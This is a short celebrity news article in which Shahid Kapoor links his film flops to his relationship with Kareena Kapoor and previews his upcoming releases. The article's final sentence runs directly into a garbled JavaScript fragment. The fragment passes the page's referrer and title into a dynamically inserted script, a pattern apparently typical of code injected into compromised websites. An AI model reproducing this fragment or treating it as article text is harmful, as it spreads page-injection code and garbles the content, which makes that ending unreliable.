Shahid Kapoor: My movies flopped when I was with Kareena

Shahid Kapoor’s next Phata Poster Nikla Hero is all set to hit the screens on 20th September. Shahid Kapoor post the debacle of his last film Mausam, has high expectations from PPHN. But the actor seems to be relaxed and maintains a calm demeanour.

When asked if his personal life was responsible for the downward graph of his professional life, Shahid retorted saying his movies flopped when he was in a stable relationship with Kareena. He also said his biggest hit till date (Jab we met) was after he broke up with her.

In an interview with a leading newspaper, Shahid said “I had many unsuccessful films. My most successful film Jab We Met came when Kareena and I had broken up. I can only see it from a practical point of view and I feel that some choices didn’t work for me. Sometimes I made choices like doing a Vivah, Jab We Met or a Kaminey, which were all three risky in their own ways but they all worked and were some of the biggest hits of my career.” He also regrets doing some of the movies in the past but not everything he had done was a bad decision but certain movies don’t work with the audience.

The 32 year old actor also added that every other movie star has faced some kind of failures in their career. Let’s hope his upcoming movies Phata Poster Nikla Hero directed by Rajkumar Santoshi and Rambo Rajkumar directed by Prabhudeva are successful.s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);
